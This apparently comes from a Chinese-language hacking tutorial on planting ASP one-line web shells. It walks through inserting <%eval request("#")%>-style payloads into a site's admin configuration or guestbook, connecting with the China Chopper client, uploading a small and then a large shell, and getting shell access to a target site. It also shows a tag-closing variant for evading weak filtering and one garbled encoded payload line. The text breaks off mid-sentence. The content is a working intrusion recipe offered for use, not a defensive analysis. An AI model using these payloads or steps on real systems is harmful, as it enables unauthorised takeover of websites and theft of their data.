一句话的使用

1进入后台之后找网站信息配置
2在企业邮局里面拷贝出来邮箱做好记录，恢复用
3在企业邮箱内插入一句话
4保存配置，打开中国菜刀(我的上传中有)
5http://www.xxxx.cn/inc/config.asp 其中XXXX为你的目标站
6菜刀右键添加，把网址第五步的丢进去 右边那一栏输入一句话的密码pass（默认）下
面的脚本类型为asp 其他不变 最后点添加
7用中国菜刀链接点击文件管理
8在inc目录下上传一个小马（注意更改后缀为asp）
9 打开http://www.xxxx.cn/inc/你的小马名字.asp
10 打开小马输入密码进入小马
11 复制文件地址输入上面的栏中后面加大马名字.asp
12 把大马以txt文档形式打开，复制粘贴至下面的栏中。
13 保存
14 访问11步骤中的大马
15 输入大马密码，成功得到shell
一句话的总结
一 留言本插入

在留言框内 插入一句话
<%eval request("#")%>
<%execute request("#")%>
┼”}数�†整 „焕敌�›∨≡┩忾
这三个都是asp一句话，在国内小站asp还是比较泛滥的。如果当前web没有进行过滤可以直接以留言的方式提交过去。
如果过滤不严可以闭合插入。如最简单的
%><%eval request("#")%><%
比如当前页
http://site/guest/guestbook.asp
你在当前页提交一句话后是不能直接链接http://site/guestbook.asp的，因为一句话代码并不在这里！
这里需要一个前提条件
1）他的数据库是为了防止*.mdb 下载而更名为
*.asa or *.asp 格式
2）满足了条件1的同时你知道他